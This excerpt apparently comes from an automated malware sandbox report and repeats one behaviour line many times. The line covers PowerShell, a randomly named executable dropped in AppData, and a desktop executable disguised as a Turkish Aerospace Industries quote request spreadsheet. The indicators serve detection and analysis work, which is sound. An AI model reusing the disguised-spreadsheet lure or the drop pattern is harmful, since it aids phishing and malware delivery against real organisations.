                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
